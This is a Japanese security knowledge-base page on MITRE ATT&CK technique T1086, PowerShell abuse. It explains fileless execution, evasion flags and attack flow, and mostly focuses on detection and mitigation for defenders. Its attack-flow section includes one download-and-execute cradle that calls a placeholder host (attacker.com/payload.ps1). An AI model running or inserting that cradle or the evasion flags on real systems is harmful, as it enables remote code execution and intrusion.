Technique - T1086-

T1086 - PowerShell

概要

PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

Administrator permissions are required to use PowerShell to connect to remote systems.

A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)

管理者によるコメント

T1086「PowerShell」 は、Windowsの強力なコマンドラインシェルおよびスクリプト言語であるPowerShellを悪用して、コードを実行する手法です。

1. 概要

この手法で攻撃者は、「OS標準の強力な機能を悪用した、ファイルレスかつ高機能な攻撃」を実現します。

何を実現できるのか

ファイルレス実行: マルウェアの本体をディスクに保存せず、メモリ上で直接実行することで、従来のアンチウイルス製品（シグネチャベース）の検知を回避します。
広範なシステム操作: .NET Framework、WMI、Win32 APIに直接アクセスできるため、情報の窃取からレジストリ操作、ネットワーク設定の変更まで、ほぼ全ての操作が可能です。
難読化による隠蔽: 実行するコマンドをBase64などでエンコードし、一見して何をしているか分からない状態で実行できます。

2. 攻撃の流れ

攻撃者は多くの場合、他の攻撃（フィッシングメールのマクロなど）からPowerShellを呼び出します。

呼び出し: 悪意のあるOffice文書やショートカットファイル（.lnk）から、背後でPowerShellを起動させます。
検知回避フラグの使用: セキュリティ機能をバイパスするために、特定の引数（フラグ）を多用します。
- -ExecutionPolicy Bypass: スクリプト実行制限を無視する。
- -WindowStyle Hidden: ユーザーに気づかれないよう、ウィンドウを出さずに実行する。
- -EncodedCommand: 難読化された（Base64）コマンドを実行する。
ペイロードの展開: インターネット上のC2サーバーから追加のスクリプトをダウンロードし、メモリ上で実行します。
- 例: IEX (New-Object Net.WebClient).DownloadString('[http://attacker.com/payload.ps1](http://attacker.com/payload.ps1)')
活動の開始: 認証情報の窃取（Mimikatzの実行）や、他の端末への横展開を開始します。

3. 防御・対策

PowerShellを「禁止」するのではなく、その「挙動を可視化」することが重要です。

スクリプトブロックログの有効化 (Event ID 4104): 難読化が解除された後の「最終的な実行コマンド」をログに記録します。これは攻撃の全容を把握するための最も強力な武器になります。
制約付き言語モード (Constrained Language Mode): PowerShellの高度な機能（API呼び出しなど）を制限し、攻撃によく使われる関数を無効化します。
AMSI (Antimalware Scan Interface) の活用: Windows標準の機能。スクリプトがメモリで実行される直前に内容をスキャンし、マルウェアを阻止します。
AppLocker / Windows Defender Application Control (WDAC): PowerShellの実行自体を特定の管理者に限定したり、署名のないスクリプトの実行をブロックしたりします。

4. 重要ポイント

Living off the Land (LotL): 攻撃者が独自のツールを持ち込まず、ターゲットのPCに元々ある「正規のツール」を使って攻撃を行うため、不審なファイルとして検知されにくいです。
管理業務との混同: IT管理者が日常業務でPowerShellを使うため、大量の正常なログの中に攻撃のログが埋もれてしまう（フォールスポジティブ）という課題があります。

5. 関連する主なCWE

CWE-77: Command Injection: アプリケーションが不適切にPowerShellコマンドを生成・実行し、攻撃者に操作を許してしまう不備。
CWE-269: Improper Privilege Management: 一般ユーザーがPowerShellを通じて、管理者権限が必要なシステム領域にアクセスできてしまう設定ミス。

6. 関連する代表的なCVE・ツール

Empire / PowerSploit / Metasploit: PowerShellをベースとした攻撃用フレームワーク。これらを使用することで、高度な攻撃を容易に自動化できます。
Emotet / TrickBot: 世界的に流行したマルウェア。初期侵入後のダウンロードや実行フェーズで、ほぼ例外なくPowerShellを悪用していました。
CVE-2022-30190 (Follina): Microsoftサポート診断ツール(MSDT)を介して、Office文書から直接PowerShellコマンドを実行させる脆弱性。

実務上のアドバイス

現代のWindows環境において、PowerShellを完全に無効化することは困難です。そのため、「管理者が普段使わない引数（-EncodedCommandなど）」や「一時フォルダからの実行」を監視のプライオリティに置くことが、迅速な検知への近道です。

分析

この攻撃手法を利用する脅威アクター

攻撃手法 – 脅威アクター Graph

← Technique一覧に戻る ← Tactics一覧に戻る

Trusted Design